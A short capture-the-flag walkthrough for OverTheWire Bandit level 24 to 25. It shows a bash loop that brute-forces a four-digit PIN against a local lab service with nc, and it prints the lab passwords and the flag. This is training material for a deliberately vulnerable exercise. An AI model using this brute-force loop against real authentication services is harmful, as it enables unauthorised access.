### Level 24 --> Level 25

1. Connect to the server 

```bash 
$ ssh -p 2220 bandit24@bandit.labs.overthewire.org
```

2. First lets see if it says anything when we listen to the port.

```bash
$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Timeout. Exiting.
```

3. Now to create a script in the temp directory that will check through all the possible 4 digit pins

```bash
$ mkdir /tmp/brute
$ touch brute.sh
$ vim brute.sh
	#Heres what the script will do
	1 bandit24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
  	2 for pin in {0000..9999}; do
  	3     echo "$bandit24 $pin"
  	4 done | nc localhost 30002
```

4. Give the script proper permissions and execute it.

```bash
$ chmod 777 brute.sh
$ ./brute.sh/
Wrong! Please enter the correct pincode. Try again.
...
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Exiting.
```

Flag is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG